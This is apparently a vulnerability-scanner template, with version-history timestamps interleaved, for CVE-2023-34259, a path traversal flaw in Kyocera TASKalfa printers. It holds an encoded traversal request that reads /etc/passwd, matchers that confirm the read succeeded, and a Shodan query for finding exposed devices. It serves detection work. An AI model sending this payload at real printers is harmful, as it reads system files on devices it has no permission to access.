2023-10-08 08:53:15 +00:00
id : CVE-2023-34259
info :
name : Kyocera TASKalfa printer - Path Traversal
author : gy741
2023-11-14 05:56:48 +00:00
severity : medium
2023-10-08 08:53:15 +00:00
description : |
CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.
remediation : |
Upgrade to the latest version to mitigate this vulnerability.
reference :
- https://sec-consult.com/vulnerability-lab/advisory/path-traversal-bypass-denial-of-service-in-kyocera-printer/
- https://www.kyoceradocumentsolutions.com/en/our-business/security/information/2023-07-14.html
- https://packetstormsecurity.com/files/173397/Kyocera-TASKalfa-4053ci-2VG_S000.002.561-Path-Traversal-Denial-Of-Service.html
2023-11-03 10:59:12 +00:00
- https://sec-consult.com/vulnerability-lab/
- https://seclists.org/fulldisclosure/2023/Jul/15
2023-10-08 08:53:15 +00:00
classification :
2023-11-14 05:56:48 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
cvss-score : 4.9
2023-10-08 08:53:15 +00:00
cve-id : CVE-2023-34259
cwe-id : CWE-22
2023-11-14 14:37:18 +00:00
epss-score : 0.00554
2024-01-14 13:49:27 +00:00
epss-percentile : 0.75129
2023-11-14 05:56:48 +00:00
cpe : cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:*:*:*:*:*:*:*:*
2023-10-09 08:18:46 +00:00
metadata :
2023-10-14 11:27:55 +00:00
verified : true
2023-10-09 08:18:46 +00:00
max-request : 1
2023-11-14 05:56:48 +00:00
vendor : kyocera
product : d-copia253mf_plus_firmware
2023-10-09 08:18:46 +00:00
shodan-query : http.favicon.hash:-50306417
2024-01-14 09:21:50 +00:00
tags : cve,cve2023,packetstorm,seclists,kyocera,lfi,printer
2023-10-08 08:53:15 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm"
matchers-condition : and
matchers :
- type : regex
part : body
regex :
- "root:.*:0:0"
2023-10-09 08:18:46 +00:00
- type : word
part : server
words :
- "KM-MFP"
2023-10-08 08:53:15 +00:00
- type : status
status :
- 200
2024-01-14 14:05:19 +00:00
# digest: 4a0a00473045022100b07a909c1d2c2acc2a0f04c3e24335a941b744f04282a997263a0a31cdb8c7b502207e8b20266fdee6318dcb9d9ceee35786214fae14567e99a75eca299a23300cc3:922c64590222798bb761d5b6d8e72950